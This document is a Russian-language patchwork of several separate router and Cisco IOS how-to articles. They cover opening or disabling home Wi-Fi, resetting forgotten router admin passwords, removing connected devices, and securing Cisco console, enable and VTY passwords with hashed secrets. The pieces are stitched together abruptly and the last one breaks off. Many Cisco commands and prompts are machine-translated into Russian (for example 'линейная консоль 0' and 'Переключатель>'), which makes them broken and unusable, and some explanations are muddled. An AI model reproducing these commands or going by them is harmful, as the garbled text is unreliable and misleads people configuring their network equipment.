- В поле авторизации введите логин и пароль, которые по умолчанию являются «admin» для обоих полей.
- Оказавшись в веб-интерфейсе роутера, нажмите на кнопку «Расширенные настройки», чтобы открыть интерфейс в расширенном его виде.
- Обратите внимание на плиточный интерфейс расширенного вида. Правая верхняя плитка соответствует разделу беспроводной настройке. Уделите её внимание.
- В верхней правой части плитки «Wi-Fi» присутствует специальный переключатель, который, когда Wi-Fi является включенным, светится зеленым цветом. Переведите параметр в выключенное состояние, и беспроводное соединение сразу же будет отключено.
- Сохраните настройки, чтобы даже после перезагрузки роутера Вай Фай остался отключенным.
- Перезагрузите устройство и убедитесь в корректности настройки.
Как отключить пароль на роутере Ростелеком
Второй вопрос, который мы хотели рассмотреть в рамках нашей сегодняшней статьи, также решается одинаково, независимо от того, о каком провайдере идет речь.
Чтобы убрать пароль на беспроводной сети, раздаваемой роутером и сделать её тем самым «бесплатной», то есть – открытой, необходимо выполнить следующие действия:
- Зайдите на страницу веб-интерфейса роутера, выполнив аналогичные действия, которые мы рассматривали в предыдущей инструкции.
- Перейдите в меню расширенных настроек.
- Обратите внимание на плитку «Wi-Fi».
- Нажмите на ссылку «Настройки безопасности».
- В пункте «Сетевая аутентификация» из выпадающего списка выберите параметр «Open», соответствующий открытой точке доступа. После выбора параметра вы заметите, что остальные поля настроек исчезли, так как теперь ни вводить пароль, ни устанавливать другие параметры нет необходимости.
- Нажмите на кнопку «Изменить».
- Сохраните сделанные изменения и перезагрузите роутер.
После включения роутера, точка беспроводного Wi-Fi доступа станет открытой и к ней можно будет подключиться без ввода пароля.
Как зайти в настройки роутера, если забыл пароль?
Привет! Когда в какой-то инструкции пишу, что нужно зайти в настройки маршрутизатора, то стараюсь подробно описывать сам процесс, как войти в панель управления, что бы выполнить там какие-то настройки. В большинстве случаев, это не вызывает каких-то сложностей. Но часто бывает такое, что мы просто забыли пароль, и появляется много вопросов, как в таком случае попасть в настройки.
Сам вопрос по входу в настройки роутера, если забыли пароль, не очень понятен. Потому что в роутере есть как минимум два пароля. И не понятно какой из них вы забыли, и в чем проблема конкретно в вашем случае.
- Пароль который используется для подключения к вашей Wi-Fi сети.
- И пароль, который нужно указать для входа в настройки роутера. Чаще всего именно этот пароль меняют, и успешно забывают его. Понятное дело, что пока мы не укажем правильный пароль, в настройки маршрутизатора мы не попадем. Ну а заводской пароль не подходит (который как правило admin), так как мы его сменили.
Вот с такими проблемами можно столкнутся в процессе входа в панель управления роутера. Сейчас мы рассмотрим решение исходя из вашего случая, рассмотрим оба варианта.
Сразу даю ссылку на инструкцию по решению самых разных проблем с которыми вы можете столкнуться при входе в настройки вашего маршрутизатора: https://help-wifi.com/oshibki-i-polomki/chto-delat-esli-ne-zaxodit-v-nastrojki-routera-na-192-168-0-1-ili-192-168-1-1/ Там так же есть ссылки на подробные инструкции для определенных производителей маршрутизаторов: TP-LINK, ASUS, D-Link и т. д.Если забыли пароль от Wi-Fi и не можете зайти в настройки роутера
Это первый вариант, в котором мы не помним пароль именно от нашей Wi-Fi сети. И возможно, не можем к ней подключится. А в настройки роутера нам нужно зайти для того, что бы посмотреть, или поменять пароль.
В таком случае, все очень просто:
- Во-первых, у нас есть очень подробная инструкция о том, что делать, если забыли пароль от Wi-Fi. Можно посмотреть пароль на компьютере (если он есть), просто вспомнить его. Подключится к беспроводной сети и зайти в панель управления.
- Во-вторых, можно зайти в настройки маршрутизатора с того устройства, которое в данный момент уже подключено к вашему Wi-Fi. И уже в настройках роутера посмотреть забытый пароль, или сменить его.
- В-третьих, подключаемся к роутеру по сетевому кабелю, и заходим в панель управления. В таком случае, пароль от Wi-Fi нам совсем не понадобится. Если не знаете как подключиться к роутеру по кабелю, то вот подробная инструкция на примере TP-LINK.
С этой проблемой я думаю разобрались.
Если забыли пароль от входа в настройки роутера
Это происходит чаще всего. Панель управления каждого маршрутизатора защищена паролем. Там нужно указывать имя пользователя и пароль. Это нужно для защиты настроек, что бы все кто подключается к вашей сети, не смогли получить к ним доступ.
Если роутер новый, еще не настроенный, то используется стандартный пароль и имя пользователя. В большинстве случаев, это admin и admin. Или вообще никакой защиты нет. Этот пароль мы устанавливаем или меняем уже в процессе настройки роутера. Я всегда в своих инструкциях советую это делать. И даже есть отдельная статья по смене/установке пароля admin.
Так вот, этот пароль мы сменили, настроили роутер, и забыли его. А тут нам срочно понадобилось зайти в настройки, и пароль мы не помним. На странице авторизации указываем какое-то имя и пароль, но ничего не происходит, страница просто перезагружается, или получаем сообщение, что пароль неверный.
Вот и все, в настройки нам никак не попасть. Если не получится вспомнить эти данные, а возможно и не вы меняли пароль, то придется делать сброс настроек роутера. После этого мы зайдем в панель управления по заводским настройкам, который указаны снизу роутера, на наклейке.
Что бы сделать сброс настроек, нужно примерно на 10 секунд зажать кнопку, которая обычно подписана как: RESET, WPS/RESET, Срос, Default. Все зависит от модели вашего руотера. Кнопка может быть утоплена в корпус, и нажимать на нее нужно чем-то острым. Питание маршрутизатора должно быть включено. Выглядит эта кнопка примерно вот так:
После возврата к заводским настройкам, для входа в панель управления используйте данные, который указаны на самом маршрутизаторе. Если там не указаны заводские данные, значит по умолчанию пароля нет.
Если возникнут трудности со сбросом настроек, то у нас на сайте есть подробные инструкции для большинства производителей. Если не найдете, пишите в комментариях, дам ссылку.
Если что-то не получилось, так же пишите, попробуем решить вашу проблему.
Как открыть свою беспроводную сеть? Убрать пароль с Wi-Fi сети
Перечислим возможные причины:
- Вы желаете временно убрать пароль и сделать свою сеть открытой. Пригодится, когда ждёте много гостей, и не хотите омрачать праздник вводами пароля
- Вы желаете убрать заводской пароль за ненадобностью. Например, живёте в частном доме, и никто ваш Wi-Fi не словит
- Вы пользуетесь старые ноутбуки, телефоны, планшеты и т.д., которые не хотят соединяться с беспроводной сетью с паролем
- Вы хотите организовать бесплатный доступ в Интернет через Wi-Fi для своих посетителей (клиентов, сотрудников)
Риски перечисленные выше можно частично нивелировать, частично избежать их.
Как убрать основные риски вязанные с открытой Wi-Fi сетью?
Использовать гостевую сеть
Некоторые роутеры содержат возможность создания гостевой сети. Это идеальный вариант.Гостевая сеть является беспроводной локальной сетью отделённой от вашей основной Wi-Fi сети, естественно, с возможностью выхода клиентских устройств в Интернет. Это ведёт к тому, что устройства разных беспроводных сетей «не видят» друг друга, что осложняет передачу вирусов между ними.
Настройками гостевой сети можно задавать максимальное количество подключённых устройств, ограничивать скорость или устанавливать приоритет по скорости для клиентских устройств гостевой сети.
Конечно, не все Wi-Fi роутеры и точки доступа в полной мере реализуют подобный функционал. Однако, проверить стоит, может и ваш роутер наделён такими возможностями.
Если гостевая сеть недоступна
Повторюсь, не все беспроводные роутеры и точки доступа поддерживают гостевую сеть. В таком случае, в первую очередь следует запаролить вход в настройки роутера, чтобы никто кроме вас не мог изменить их. Во-вторых, убедитесь, что общий доступ к вашим файлам на компьютере отключён. Думаю, вам будет неприятно, если кто-то получит доступ к файлам и папкам, без вашего на то согласия.При использовании старых компьютеров, которые некорректно работают с беспроводными сетями с паролем, и нежелании делиться интернетом, роутеру можно разрешить соединение только с устройствами чей MAC-адрес прописан в роутере. Это делается в настройках роутера, но не является частью темы статьи.
Как войти в настройки Wi-Fi роутера
Соедините ваш компьютер с роутером через LAN разъём. Если настройки проводится с помощью беспроводной сети ознакомьтесь с «Как настроить роутер с планшета или телефона». Включите электропитание. Дождитесь полной загрузки роутера (это может занять несколько минут). Откройте ваш интернет браузер и введите в адресной строке адрес 192.168.0.1 или 192.168.1.1, или 192.168.2.1, адрес написан с обратной стороны роутера. Возможно вам будет полезной статья «Если адрес 192.168.1.1 не открывается. Вэб-интерфейс роутера не доступен». В браузере «выскочит» окно и попросит ввести логин (имя пользователя) и пароль, их вы найдёте всё на той же обратной стороне роутера. По умолчанию в большинстве Wi-Fi роутеров используются логин: admin, пароль: admin, или логин: admin, пароль: «оставить пустым».Важно! Желательно сменить имя сети (SSID) как описанно в статье «Как изменить название Wi-Fi сети (имя сети, SSID)». Если для ваc принципиально сохранить привычное название Wi-Fi сети, прочтите статью «Как удалить Wi-Fi сеть, профиль сети на Windows XP, 7, 8, Android и iOS устройствах».
Рассмотрим как убрать пароль Wi-Fi сети и сделать её открытой на примере Wi-Fi роутеров:
Как на роутере ASUS убрать пароль Wi-Fi сети, сделав её открытой
Открыв страницу настроек роутера фирмы ASUS, нажмите слева «Беспроводная сеть»(Wireless). На обновившейся странице найдите впадающий список «Метод проверки подлинности»(Authentication method), и выберите в списке «Открытая»(Open System).
Убрать пароль Wi-Fi сети на роутере ASUS старой модели |
Убрать пароль Wi-Fi сети на роутере ASUS новой модели |
Также желательно сменить имя сети (SSID), иначе компьютер будет пытаться связать название Wi-Fi с бывшим паролем, и это может вызвать проблемы. Для ASUS это проще простого, взгляните на картинки. Если очень нужно убрать пароль, а имя сети оставить тем же, то ссылка на то как это сделать выше в статье.
Вот так просто.
Как на роутере TP-LINK убрать пароль Wi-Fi сети и сделать её открытой
Как открыть веб-страницу настроек роутера мы рассмотрели выше. Слева выберите пункт «Беспроводная сеть»(Wireless), в открывшемся списке выберите «Безопасность»(Wireless Security). На обновившейся странице поставьте «галочку» напротив «Отключить безопасность»(Disable Security).
Убрать пароль Wi-Fi сети на роутере TP-LINK |
Чтобы сохранить изменения нажмите кнопку «Сохранить»(Save). Также желательно сменить имя сети (SSID). Выше в статье ссылки на инструкцию, как это сделать, и на инструкцию, что делать, если нужно оставить название сети тем же.
Убрать пароль Wi-Fi сети, открыв её, на роутере Netgear
Что нам надо сделать чтобы открыть сеть в Netgear? В принципе, ничего сложного.
Нажимаете слева «Wireless Settings»(Настройки беспроводной сети), и на обновившейся странице
в разделе «Security Options»(Опции безопасности) выберите «Disable»(Отключить).
Убрать пароль Wi-Fi сети на роутере Netgear |
Желательно сменить имя сети (SSID). Для Netgear это очень легко. Просто взгляните на картинку выше и вы всё поймёте. Если критично оставить SSID (имя сети) без изменения, смотрите выше в статье ссылку на инструкцию.
Как на Wi-Fi роутере D-Link убрать пароль беспроводной сети и сделать её открытой
Веб-интерфейсы роутеров D-link, могут отличаться не только визуально, но и иметь разное расположение пунктов настроек. Поэтому рассмотрим несколько вариантов отдельно. Названия выбраны интуитивно, не привязывайтесь к ним.
Также после снятия пароля желательно сменить имя сети (SSID). Для D-Link сделать это очень легко. Ссылка на нструкцию выше статье.
Оранжевый вэб-интерфейс D-Link
Слева выберите «Wireless Settings»(Настройки беспроводной сети), «Manual Settings»(Настроить вручную), на обновившейся странице найти «Security Mode»(Тип Безопасности), и выбрать в выпадающем списке «None»(Нет).Убрать пароль Wi-Fi сети на роутере D-Link. Оранжевый веб-интерфейс |
Затем следует сохранить настройки «Save Settings»(Сохранить настройки).
Серый вэб-интерфейс D-Link
Внизу данной страницы настроек вы найдёте ссылку «Advanced Settings»(Расширенные настройки), нажмите её. На обновившейся странице справа вы найдёте раздел Wi-Fi, где следует нажать «Security settings»(Настройки безопасности). Настройках безопасности следует выбрать в выпадающем списке «Open»(Открытая).Убрать пароль Wi-Fi сети на роутере D-Link. Серый веб-интерфейс |
Затем следует применить настройки «Apply»(Применить).
Белый вэб-интерфейс(air-interface) D-Link
Слева вы нажмите раздел Wi-Fi, где следует выбрать «Security settings»(Настройки безопасности). Настройках безопасности следует выбрать в выпадающем списке «Open»(Открытая).Убрать пароль Wi-Fi сети на роутере D-Link. Белый веб-интерфейс |
Затем следует применить настройки «Apply»(Применить).
Сделать открытой беспроводную сеть на Wi-Fi роутере Zyxel
Вэб-интерфейсы Zyxel тоже могут отличаться визуально. Мы дадим рассмотренным веб-интерфейсам имена, хотя официальные их названия нам неизвестны.Ещё после отмены пароля желательно сменить имя сети (SSID). Для Zyxel сделать это очень легко. Ссылка на нструкцию выше статье.
Классический интерфейс Zyxel
В открывшейся странице нажмите «Сеть Wi-Fi»(Wireless), в открывшемся списке нажать «Безопасность»(Security). На обновившейся странице найти надпись «Проверка подлинности» и выбрать в выпадающем списке «Не использовать»(Don’t use).Убрать пароль Wi-Fi сети на роутере Zyxel. Классический веб-интерфейс |
Затем следует применить настройки «Применить»(Apply).
Современный интерфейс Zyxel
В открывшейся странице нажмите иконку Wi-Fi, в открывшемся окне снимите «галочку» напротив надписи «Использовать защиту соединений»(Use connection security). Сохраните настройки.Убрать пароль Wi-Fi сети на роутере Zyxel. Современный веб-интерфейс |
Как на Wi-Fi роутере Linksys убрать пароль беспроводной сети
Для роутеров фирмы Linksys убрать пароль беспроводной сети особенно легко. Вверху страницу настроек выберите пункт «Беспроводная сеть»(Wireless), в открывшемся списке выберите «Безопасность»(Wireless Security). На обновившейся странице в выпадающем списке выберите «Отключено»(Disabled).
Убрать пароль Wi-Fi сети на роутере Linksys |
Чтобы сохранить изменения нажмите кнопку «Сохранить настройки»(Save Settings). Желательно сменить имя сети (SSID), иначе понадобиться удалить параметры беспроводной сети (ссылка на инструкцию как это размещена выше по тексту).
Как на Wi-Fi роутере Netis убрать пароль Wi-Fi
Netis — уважаемая фирма наводнившая страны СНГ недорогими, но вполне приличными роутерами. Убрать пароль с беспроводной сети тут не сложнее, чем в роутерах фирм рассмотренных выше.
Слева выберите пункт «Беспроводная сеть»(Wireless), в открывшемся списке выберите «Настройки Wi-Fi»(Wireless Settings). На обновившейся странице возле надписи «Тип аутентификации»(Authentication Type) в выпадающем списке выберите «Нет»(None).
Убрать пароль Wi-Fi сети на роутере Netis |
Чтобы сохранить изменения нажмите кнопку «Сохранить»(Save).
Возможно понадобится сменить имя сети (SSID), это поможет избежать конфликта с сохранёнными параметрами сети на компьютере и беспроводных устройствах.
Вот и всё. Если вам была интересна статья, напишите об этом в комментариях или поделитесь ею в соцсетях. Удачи и хорошего настроения.
Как удалить устройства с маршрутизатора Wi-Fi
Если вы экспериментируете с беспроводным подключением, вам может быть интересно, как удалить устройства с маршрутизатора Wi-Fi. В конце концов, лучшие маршрутизаторы могут работать медленно, когда слишком много устройств одновременно используют данные. Продолжайте читать, чтобы узнать все о том, как удалить подключенные устройства из активного использования маршрутизатора.
- Удалите любое мобильное устройство из сети wi-fi, изменив пароль, что заставит всех отключиться.
- Вы также можете повысить безопасность, добавив шифрование, проверив IP-адрес и изменив имя сети.
- Наконец, проверьте, нет ли локальных сбоев в работе Интернета, и обязательно оплатите счет, так как любой из них может ограничивать ваши беспроводные сигналы и отключать вашу беспроводную сеть.
Удаление устройств с маршрутизатора
Этот процесс зависит от марки и модели маршрутизатора, поэтому можно попробовать несколько способов.
Измените свой пароль
Простой способ удалить неавторизованные устройства из вашей сети — просто изменить пароль Wi-Fi.Это приведет к принудительному отключению всех устройств от сети, поэтому вам придется снова войти в систему с новым паролем на всех ваших устройствах. К счастью, так будет и со всеми остальными, и если у них нет нового пароля, что ж, им не повезло. Как только все посторонние лица покинут вашу беспроводную сеть, вы можете сосредоточиться на других вещах, например, на том, как исправить красный свет на маршрутизаторе.
Эксперты говорят, что вам следует менять пароль маршрутизатора примерно каждые два месяца или чаще, если вы живете в городской местности.
Изменить имя сети и добавить шифрование
Эти шаги аналогичны смене пароля, но делают еще один шаг вперед. Пока вы меняете пароль, продолжайте, а также измените само имя сети. Таким образом, люди даже не будут знать, к какой сети нужно пытаться получить доступ для этого приятного бесплатного Интернета. Вы также можете сделать дополнительный шаг и зашифровать сетевой трафик, используя шифрование WPA или WPA2.
Доступ к программному обеспечению маршрутизатора
Вы можете получить доступ к программному обеспечению вашего маршрутизатора или к программному обеспечению интернет-провайдера, чтобы вручную отключить любое устройство, использующее вашу сеть.Это можно сделать, зайдя на специальный веб-портал, предоставленный вам интернет-провайдером, или просто подключив сам маршрутизатор к персональному компьютеру, если вам интересно, для чего нужен USB-порт на маршрутизаторе. После доступа удалите все подозрительные устройства. В качестве дополнительного бонуса вы можете установить другие параметры безопасности с помощью этого же программного обеспечения и загрузить новые драйверы.
Сохраняйте бдительность
Ни одна сеть не может быть безопасной навсегда. При необходимости повторите описанные выше шаги, чтобы защитить ваше беспроводное соединение от злоумышленников и потенциальных воров.Установите напоминание о регулярной смене пароля и доступе к программному обеспечению маршрутизатора, чтобы узнать, кто использует вашу сеть.
Часто задаваемые вопросы
Как управлять устройствами в вашем доме с безопасным Wi-Fi?
Чтобы удалить устройства, подключенные к точке доступа, и другие неавторизованные устройства с вашего маршрутизатора Wi-Fi, измените пароль и выполните другие шаги, перечисленные выше.
Как удалить старые устройства из моей сети?
Чтобы удалить старые и неактивные устройства с вашего маршрутизатора Wi-Fi, зайдите в программное обеспечение маршрутизатора, найдите управление устройствами и вручную удалите все.
Какие устройства должны быть на 2,4ГГц и 5ГГц?
Гаджеты, которым требуется подключение к Интернету с высокой пропускной способностью, например игровые приставки, должны использовать сеть Wi-Fi 5 ГГц, в то время как все остальное может работать с подключением 2,4 ГГц.
STAT: Поскольку Wi-Fi на частоте 2,4 ГГц передает сигналы на более низкой частоте, он может еще больше расширить зону покрытия WiFi, легко проникая сквозь стены вашего дома и твердые объекты. Между тем, более высокая частота Wi-Fi 5 ГГц поддерживает гораздо более высокие скорости, что позволяет быстрее загружать и скачивать файлы для повышения производительности.(источник)
Отключение службы восстановления пароля маршрутизатора Cisco
Большинство инженеров Cisco знают о классическом сервисе восстановления пароля, которым оснащено оборудование Cisco. Если учетные данные устройства утеряны, выполнение процедуры восстановления пароля эффективно обеспечит полный доступ к конфигурации устройства.
Отключая службу восстановления пароля, вы запрещаете любому лицу, имеющему физический доступ к устройству (например, консольному порту), выполнять процесс восстановления пароля и получать доступ к его конфигурации.
Отключение службы восстановления пароля требует особого внимания, потому что если вы потеряете свой пароль, пути назад уже не будет. Настоятельно рекомендуется всегда хранить резервную копию ваших конфигураций в безопасном месте — на всякий случай.
Вы также заметите, что команда ‘ no service password-encryption ‘ не будет отображаться при нажатии ‘?’ (для справки), так как эта команда не задокументирована в справке IOS.
Ниже приведены действия по отключению службы восстановления пароля и сообщение с подтверждением, отображаемое при загрузке устройства после отключения службы восстановления пароля:
R1(config)# no service password-recovery
ВНИМАНИЕ:
Выполнение этой команды отключит механизм восстановления пароля.Не выполняйте эту команду без другого плана восстановления пароля.
Вы уверены, что хотите продолжить? [да/нет]: да
R1(config)# выход
R1# перезагрузка
Продолжить перезагрузку? [подтвердить]
После подтверждения команды перезагрузки маршрутизатор продолжит процесс перезагрузки, который в основном представляет собой перезагрузку. По мере выполнения процесса перезагрузки маршрутизатор выдаст сообщение о том, что функция восстановления пароля отключена:
. Начальная загрузка системы, версия 12.4(13r)T, ВЫПУСК ПРОГРАММНОГО ОБЕСПЕЧЕНИЯ (fc1)Поддержка TAC: http://www.cisco.com/tac
Copyright (c) 1986-2009 Cisco Systems, Inc.
Процессор c2811 с 240640 Кбайт оперативной памяти
Основная память настроена на 64-битный режим с отключенной четностью
Инициализация ROMMON только для чтения
ФУНКЦИЯ ВОССТАНОВЛЕНИЯ ПАРОЛЯ ОТКЛЮЧЕНА
Резюме статьи
В этой статье рассказывается о службе восстановления пароля и о том, как отключить ее на устройстве Cisco.
Если статья оказалась для вас полезной, мы будем очень признательны, если вы поделитесь ею с другими, воспользовавшись услугами, указанными в левом верхнем углу этой статьи. Обмен нашими статьями занимает всего минуту вашего времени и помогает Firewall.cx привлечь больше людей с помощью таких услуг.
Защита режима пользователя и привилегированного режима
В этом уроке мы рассмотрим, как можно защитить пользовательский режим и привилегированный (включить) режим. По умолчанию аутентификация не требуется.Если вы подключите консольный кабель Cisco к коммутатору или маршрутизатору, произойдет следующее:
Переключатель con0 теперь доступен
Нажмите RETURN, чтобы начать.
Переключатель>
Как только вы нажмете кнопку ввода, мы сразу попадем в пользовательский режим. Там нет пароля или чего-то еще. То же самое относится и к режиму включения:
Переключение> включить
Переключатель №
У нас сразу полный доступ. Это то, что вы, возможно, захотите изменить, что я объясню в этом уроке.
Безопасность пользовательского режима
Начнем с пользовательского режима.
Простой пароль
Самый простой вариант защиты пользовательского режима — добавить пароль. Вот как это сделать:
Switch(config)# линейная консоль 0
Для начала нам нужно войти в настройки консоли. Здесь мы должны добавить две команды:
Switch(config-line)# пароль cisco
Switch(config-line)# логин
Мы настраиваем пароль (cisco) и используем команду входа в систему, чтобы указать Cisco IOS запросить этот пароль.В следующий раз, когда вы откроете консоль, произойдет следующее:
. Переключатель con0 теперь доступен
Нажмите RETURN, чтобы начать.
Проверка доступа пользователя
Пароль:
Переключатель>
Интерфейс командной строки запросит у вас пароль. По крайней мере, у нас есть какая-то форма аутентификации, но мы можем добиться большего…
Имя пользователя и пароль
Вместо одного пароля также можно использовать имена пользователей и пароли. Это лучший вариант, если у вас есть несколько человек, которым нужен доступ к вашему маршрутизатору или коммутатору.Вот как это сделать:
Switch(config)# линейная консоль 0
Switch(config-line)# логин локальный
Switch(config-line)# exit
Switch(config)# имя пользователя admin пароль cisco
В настройках консоли мы используем команду login local , чтобы указать коммутатору обратиться к локальной базе данных имен пользователей и паролей для аутентификации. В глобальном конфиге создаем имя пользователя «admin» с паролем «cisco».
В следующий раз, когда вы откроете консоль, вы увидите следующее:
Переключатель con0 теперь доступен
Нажмите RETURN, чтобы начать.
Проверка доступа пользователя
Имя пользователя: админ
Пароль:
Переключатель>
Коммутатор запрашивает наше имя пользователя и пароль.
Включить безопасность режима
Как насчет режима включения/привилегированного режима? Мы также можем добавить туда пароль. Вам нужно сделать это из режима конфигурации:
Переключатель# Конфигурация терминала
Теперь мы можем установить пароль для включения режима:
Switch(config)# включить пароль cisco
Давайте посмотрим, работает ли наш пароль «cisco».Выходим из режима включения:
Переключатель# отключить
И прыгнуть обратно:
Переключение> включить
Пароль:
Теперь коммутатор запрашивает пароль.
Шифрование пароля
В приведенных выше примерах мы использовали пароли, но есть одна проблема… все они отображаются в нашей конфигурации открытым текстом. Посмотрите ниже:
Коммутатор № показать текущую конфигурацию | включить пароль
нет сервисного пароля-шифрование
включить пароль cisco
имя пользователя пароль администратора 0 cisco
Это чистый текст.Если кто-то украдет один из ваших коммутаторов или маршрутизаторов, у него будут ваши пароли. Если вы когда-нибудь сделаете резервную копию своей конфигурации и забудете удалить пароли, та же проблема.
В Cisco IOS есть команда, позволяющая шифровать все пароли открытым текстом в вашей конфигурации. Вот как:
Switch(config)# сервисный пароль-шифрование
Команда service password-encryption зашифрует каждый пароль в виде обычного текста. Здесь вы можете увидеть результат:
Коммутатор № показать текущую конфигурацию | включить пароль
сервисный пароль-шифрование
включить пароль 7 13061E010803
имя пользователя пароль администратора 7 110A1016141D
Сейчас у вас может возникнуть теплое смутное ощущение, что все зашифровано, но на самом деле это очень плохой (сломанный) алгоритм шифрования.Существуют веб-сайты, которые позволяют расшифровывать эти зашифрованные строки на лету. Если вы хотите попробовать это, вот один из таких сайтов.
Нам нужно что-то покрепче…
Секрет
Cisco IOS поддерживает нечто, называемое секретом, в качестве альтернативы паролю. Давайте попробуем это для режима включения:
Switch(config)# enable secret ?
0 Указывает, что последует НЕЗАШИФРОВАННЫЙ пароль.
5 Указывает, что секрет MD5 HASHED будет следовать
8 Указывает, что секрет PBKDF2 HASHED будет следовать
9 Указывает, что секрет SCRYPT HASHED будет следовать
СТРОКА НЕЗАШИФРОВАННЫЙ (открытый текст) «разрешающий» секрет
level Задать пароль уровня exec
Выше вы можете видеть, что этот коммутатор поддерживает хеши MD5, PBKDF2 и SCRYPT.Старые устройства IOS поддерживают только аутентификацию MD5.
Давайте попробуем:
Switch(config)# enable secret cisco
Нашим секретом будет «cisco». Посмотрим, что мы находим в конфигурации:
Коммутатор № показать текущую конфигурацию | включить секрет
включить секрет 5 $1$CANW$U9Y8O6KeFhrFR4l1Qo07h/
Теперь вы найдете хэш MD5 в конфигурации. «5», которую вы видите за «enable secret», — это алгоритм, который мы используем, 5 означает MD5.
MD5 в настоящее время не считается безопасным. Подбирать простые пароли очень легко. Например, попробуйте этот веб-сайт для хеша MD5, который был создан для моего секретного «cisco». Восстановление займет всего несколько секунд.
Давайте попробуем один из других алгоритмов, которые в настоящее время считаются безопасными. Вот как вы можете выбрать алгоритм для режима включения:
Switch(config)# включить тип алгоритма ?
md5 Кодировать пароль с помощью алгоритма MD5
scrypt Закодировать пароль с помощью алгоритма хеширования SCRYPT.
sha256 Закодировать пароль с помощью алгоритма хеширования PBKDF2
Давайте попробуем алгоритм хеширования PBKDF2 (SHA256):
Switch(config)# включить тип алгоритма sha256 secret cisco
Когда мы посмотрим на нашу конфигурацию, мы увидим новый хеш:
Коммутатор № показать текущую конфигурацию | включить секрет
включить секрет 8 $8$dvX/fx/FJ0Snk2$HhqrOUaEtBgk4zJvG2IQuAJNUicZmmELelC/L6.Фкл2
«8» после «включить секрет» относится к алгоритму хеширования PBKDF2, который мы использовали.
В приведенном выше примере я изменил алгоритм хеширования для режима включения, но мы также можем сделать это для имен пользователей. Вот пример:
Switch(config)# имя пользователя rene алгоритм-тип sha256 секрет cisco
Мое имя пользователя теперь также использует SHA256 в качестве пароля «cisco». Вот как это выглядит:
Коммутатор № показать текущую конфигурацию | включить рене
имя пользователя rene secret 8 $8$dyzsAmZjA3w.AY$YBZn8LBI6CK04ij5ZmqQ/88OrFdc3jzGb6v7SSQI0cw
Убедитесь, что вы используете надежные пароли. Независимо от того, какой алгоритм хэширования вы используете, слабые пароли, такие как «cisco», легко восстанавливаются.
Внешние серверы аутентификации
Настройка имен пользователей и секретов на устройствах Cisco IOS является хорошей практикой, но у нас есть одна проблема — масштабируемость. Если у вас есть сеть с несколькими устройствами, вам придется настроить свои имена пользователей/секреты на всех устройствах. Если вы меняете свой пароль, вы должны сделать это на всех устройствах.
В больших сетях мы обычно используем серверы аутентификации, называемые серверами RADIUS или TACACS+. На этих серверах мы настраиваем наши имена пользователей. Когда кто-то пытается получить доступ к консоли или включить режим на одном из ваших коммутаторов или маршрутизаторов, он проверяет учетные данные на сервере аутентификации.
Это позволяет вам сохранять вашу аутентификацию централизованной. Об этом мы поговорим на других уроках.
Заключение
Теперь вы узнали, как защитить пользователя и включить режим ваших устройств Cisco IOS.Убедитесь, что вы используете «секретные» пароли вместо простых текстовых паролей и, если возможно, используйте более надежный алгоритм хеширования, чем MD5 по умолчанию.
Как включить пароль для линии VTY Cisco (пароль Telnet) на маршрутизаторе/коммутаторе Cisco (с помощью Cisco Packet Tracer) — UPaae
Линия Cisco VTY (линия виртуального терминала):
VTY — это сокращение от линий виртуального терминала, которое используется для удаленного доступа к маршрутизатору через telnet с использованием этих интерфейсов виртуального маршрутизатора.Количество линий Cisco vty не является одинаковым для всех маршрутизаторов, но разные маршрутизаторы/коммутаторы Cisco могут иметь разное количество линий vty. Чем больше линий vty у маршрутизатора или коммутатора, тем больше пользователей могут получить одновременный доступ к этому устройству через telnet.
Вы также должны узнать о зашифрованном пароле включения режима или о включении секретного пароля cisco.
Проверка количества линий Cisco VTY:Количество линий vty определяет количество одновременных подключений telnet, которые мы можем иметь к этому конкретному маршрутизатору/коммутатору cisco.С точки зрения безопасности чрезвычайно важно знать количество виртуальных линий, которые есть у вашего маршрутизатора/коммутатора, и эти линии vty должны быть защищены паролем для предотвращения несанкционированного доступа через telnet.
Хотя установка пароля линии vty не является обязательным требованием, в целом рекомендуется защищать линию консоли, режим включения и вспомогательную линию, устанавливая пароль для каждой из них.
Когда вы находитесь в режиме глобальной конфигурации, введите line vty ? эта команда покажет количество линий vty или интерфейсов вашего маршрутизатора.
UpaaeRouter1(congif)# строка vty ? // эта команда отобразит количество строк vty.
Установка линии VTY/TELNET Пароль:
Для установки пароля для линий VTY необходимо находиться в режиме глобальной конфигурации. Поскольку у нас есть 16 интерфейсов/линий в диапазоне от 0 до 15, мы укажем один пароль для всех них, чтобы защитить наш маршрутизатор. 16 интерфейсов/линий означает, что у нас может быть 16 одновременных подключений telnet (удаленных) к этому маршрутизатору.
В режиме глобальной конфигурации введите line vty 0 15 для входа в режим конфигурации линии vty.
Синтаксис команды: строка vty начальный-интерфейс конечный-интерфейс-диапазон
UpaaeRouter1(config)# строка vty 0 15 UpaaeRouter1(line-config)# // После выполнения приведенной выше командной строки изменится на это. UpaaeRouter1(line-config)# password upaaeVty //эта команда установит upaaeVty в качестве вашего пароля VTY. UpaaeRouter1(line-config)#login // эта команда принудительно вводит пароль перед доступом к маршрутизатору через TELNET (удаленное подключение).Как удалить пароль cisco line vty:
В cisco удалить или отменить настройки очень просто, просто введите no перед командой, которую вы использовали для внесения изменений. Для удаления пароля линии vty перейдите в режим глобальной конфигурации, затем в режим конфигурации линии и не вводите пароль. Чтобы добавить дополнительную безопасность маршрутизатору, вам также следует прочитать Как установить пароль линейной консоли, Как установить пароль вспомогательной линии и как включить секретный пароль на маршрутизаторе cisco.
UpaaeRouter1# настроить терминал UpaaeRouter1(config)# строка vty 0 15 UpaaeRouter1(line-config)# без пароля
При нажатии на ввод пароля vty cisco линия будет отключена. Теперь, когда вы узнали, как установить пароль линии vty и как удалить пароль vty (пароль Telnet), вы можете узнать, как подключиться к маршрутизатору Cisco через Telnet.
Если вам понравился этот урок, поделитесь им с друзьями и оставляйте комментарии по любым вопросам.
Сброс пароля Cisco 2800 — Vology
Это случается с лучшими сетевыми инженерами Cisco.Вы устанавливаете пароль для своих маршрутизаторов Cisco серии 2800, и проходит много времени. Когда вы входите, чтобы войти в свой маршрутизатор, доступ запрещен. Чувство разочарования может быть немного чрезмерным, но мы здесь, чтобы помочь. Пожалуйста, следуйте приведенным ниже инструкциям по восстановлению пароля, чтобы снова войти в свой маршрутизатор Cisco.
Способ 1- Подключите терминал или ПК с эмуляцией терминала к консольному порту маршрутизатора и убедитесь, что у вас правильные настройки терминала.Они включают в себя отсутствие управления потоком, 1 стоповый бит, 8 битов данных, отсутствие четности и скорость 9600 бод.
- Если у вас есть доступ к маршрутизатору, введите show version на экране запроса и задокументируйте настройку регистра конфигурации.
- Далее выключите роутер и подождите примерно 5 секунд и снова включите его.
